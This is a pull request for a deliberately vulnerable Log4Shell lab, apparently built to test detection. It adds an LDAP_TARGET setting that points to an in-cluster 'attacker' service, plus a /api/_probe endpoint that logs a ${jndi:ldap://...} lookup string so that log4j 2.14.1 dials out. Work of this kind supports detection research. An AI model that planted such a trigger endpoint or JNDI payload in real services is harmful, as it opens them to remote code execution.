### PR TITLE
log4j backend: configurable LDAP callback location (LDAP_TARGET env)

### DIFF
--- a/example/log4j-chain/backend/Dockerfile.contained
+++ b/example/log4j-chain/backend/Dockerfile.contained
@@ -11,4 +11,8 @@ RUN LOG4J_VERSION=2.14.1 mvn -B package -DskipTests
 FROM gcr.io/distroless/java11-debian11
 COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar /app/app.jar
 EXPOSE 8080
+# Where the malicious LDAP referral server lives. Here the JNDI lookup DOES fire
+# (log4j 2.14.1) but the distroless runtime has no /bin/sh, so the loaded class
+# cannot spawn — the "contained" posture. Overridable per deployment/namespace.
+ENV LDAP_TARGET=attacker.attacker-ns.svc.cluster.local:1389
 ENTRYPOINT ["java","-jar","/app/app.jar"]

--- a/example/log4j-chain/backend/Dockerfile.patched
+++ b/example/log4j-chain/backend/Dockerfile.patched
@@ -15,4 +15,8 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
 WORKDIR /app
 COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar ./app.jar
 EXPOSE 8080
+# Where the (would-be) LDAP referral server lives. On this patched build the
+# /api/_probe trigger is logged literally — no lookup, no egress — so the value
+# is inert here, kept only so all three scenario images share one env contract.
+ENV LDAP_TARGET=attacker.attacker-ns.svc.cluster.local:1389
 ENTRYPOINT ["java","-jar","/app/app.jar"]

--- a/example/log4j-chain/backend/Dockerfile.vulnerable
+++ b/example/log4j-chain/backend/Dockerfile.vulnerable
@@ -14,6 +14,11 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
 WORKDIR /app
 COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar ./app.jar
 EXPOSE 8080
+# Where the malicious LDAP referral server lives — the host:port the Log4Shell
+# JNDI lookup dials out to. Placeholder default points at the in-repo attacker
+# Service; override per deployment/namespace so this one image is portable
+# without rebaking attack payloads. Consumed by App.java's /api/_probe endpoint.
+ENV LDAP_TARGET=attacker.attacker-ns.svc.cluster.local:1389
 # JNDI/LDAP class loading: temurin-11 sets `com.sun.jndi.ldap.object.trustURLCodebase=false`
 # by default (since JDK 11.0.1) — without this flag the Log4Shell chain stops at
 # LDAP referral, never fetches the Payload.class. Enabling it makes the JVM

--- a/example/log4j-chain/backend/src/main/java/io/fusioncore/App.java
+++ b/example/log4j-chain/backend/src/main/java/io/fusioncore/App.java
@@ -16,21 +16,33 @@ import java.util.concurrent.Executors;
  * Minimal HTTP API:
  *   GET  /api/products?q=...        — logs User-Agent through log4j (vulnerable surface)
  *   POST /api/login                 — accepts JSON {user,pass}, returns a fake JWT
+ *   GET  /api/_probe                — self-fires the JNDI trigger at LDAP_TARGET
  *
  * Reads postgres connection settings from env (POSTGRES_HOST, POSTGRES_USER,
  * POSTGRES_DB). Trust auth assumed.
+ *
+ * LDAP_TARGET is where the malicious LDAP referral server lives — the location
+ * the Log4Shell JNDI lookup dials out to. It is only a placeholder default
+ * (attacker.attacker-ns.svc.cluster.local:1389, the in-repo attacker Service);
+ * override it per deployment/namespace so this one image is portable to any
+ * cluster layout without rebaking attack payloads.
  */
 public class App {
     private static final Logger log = LogManager.getLogger(App.class);
+
+    /** Where the malicious LDAP referral server is located (host:port). Overridable via env. */
+    private static final String LDAP_TARGET =
+        System.getenv().getOrDefault("LDAP_TARGET", "attacker.attacker-ns.svc.cluster.local:1389");
 
     public static void main(String[] args) throws IOException {
         int port = Integer.parseInt(System.getenv().getOrDefault("PORT", "8080"));
         HttpServer s = HttpServer.create(new InetSocketAddress(port), 0);
         s.createContext("/api/products", new ProductHandler());
         s.createContext("/api/login", new LoginHandler());
+        s.createContext("/api/_probe", new ProbeHandler());
         s.setExecutor(Executors.newFixedThreadPool(4));
         s.start();
-        log.info("chain-backend started on port {}", port);
+        log.info("chain-backend started on port {} (ldap_target={})", port, LDAP_TARGET);
     }
 
     static class ProductHandler implements HttpHandler {
@@ -41,6 +53,24 @@ public class App {
             log.info("product query q={} ua={}", q, ua);
 
             String body = "{\"products\":[]}";
+            ex.sendResponseHeaders(200, body.length());
+            try (OutputStream os = ex.getResponseBody()) { os.write(body.getBytes()); }
+        }
+    }
+
+    /**
+     * Self-probe: emits the JNDI trigger through the SAME vulnerable log4j line
+     * as ProductHandler, aimed at the configured LDAP_TARGET. Lets a caller fire
+     * one deterministic, off-profile LDAP egress (a falsifiability probe) without
+     * deploying a separate attack pod — the destination is wherever LDAP_TARGET
+     * points. On a patched build (scenario C) the string is logged literally and
+     * no lookup happens, which is exactly the posture that endpoint demonstrates.
+     */
+    static class ProbeHandler implements HttpHandler {
+        public void handle(HttpExchange ex) throws IOException {
+            String trigger = "${jndi:ldap://" + LDAP_TARGET + "/Probe}";
+            log.info("self-probe q={} ua={}", "probe", trigger);
+            String body = "{\"probe\":\"jndi:ldap://" + LDAP_TARGET + "/Probe\"}";
             ex.sendResponseHeaders(200, body.length());
             try (OutputStream os = ex.getResponseBody()) { os.write(body.getBytes()); }
         }


### PR DESCRIPTION
## What

The official Log4Shell backend image (`log4j-chain-backend-vulnerable`, and the `-patched`/`-contained` variants) had the malicious LDAP referral host — `attacker.attacker-ns.svc.cluster.local:1389` — hard-baked into the attack payloads and the attacker image. The backend itself never knew *where the LDAP was located*; the only way to point the JNDI lookup at a different host was to rebake the attack payloads.

That blocks portability. Consumers that deploy this backend under a different namespace/layout — e.g. the **dx noise suite**, which runs it as `backend.java-poc` and needs a falsifiability probe for issue [entlein/bob#28](https://github.com/entlein/bob/issues/28) — can't reuse the published image as-is.

## Change

- **`LDAP_TARGET` env** (default `attacker.attacker-ns.svc.cluster.local:1389`, the in-repo attacker Service) added to all three backend Dockerfiles. This is the placeholder for *where the LDAP is located*; override it per deployment/namespace, no rebuild, no payload edits.
- **`GET /api/_probe`** endpoint in `App.java`: emits `${jndi:ldap://<LDAP_TARGET>/Probe}` through the **same vulnerable log4j line** as `/api/products`. This turns the image into a self-contained, configurable Log4Shell self-probe — a single deterministic, off-profile LDAP egress can be fired without deploying a separate attack pod.

Why this shape: a benign-bed falsifiability check (issue #28 acceptance #2) needs *one* synthetic off-profile action that produces `>0` referrals, proving the learned SBoB isn't so broad it silences a real deviation. `/api/_probe` is exactly that, aimed at wherever the bed's cluster keeps its LDAP. Normal `/api/products` traffic is untouched, so benign profiles stay clean and the endpoint only fires when explicitly hit.

Scenario semantics preserved:
- **vulnerable** (2.14.1) — lookup fires, dials `LDAP_TARGET`.
- **contained** (2.14.1 distroless) — lookup fires but the loaded class can't spawn (no `/bin/sh`).
- **patched** (2.17.1) — string logged literally, no lookup (env inert, kept for a shared contract).

## Verification

`mvn package` builds the jar. Runtime smoke with `LDAP_TARGET=lab.example.test:1389`:

```
INFO io.fusioncore.App - self-probe q=probe ua=${jndi:ldap://lab.example.test:1389/Probe}
... java.net.UnknownHostException: lab.example.test   <- log4j 2.14.1 dialed the configured LDAP (egress fired)
HTTP/1.1 200 OK
{"probe":"jndi:ldap://lab.example.test:1389/Probe"}
```

The image rebuild/publish happens via `ci-log4j-chain-images.yaml` on merge to `main` (or `workflow_dispatch`).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
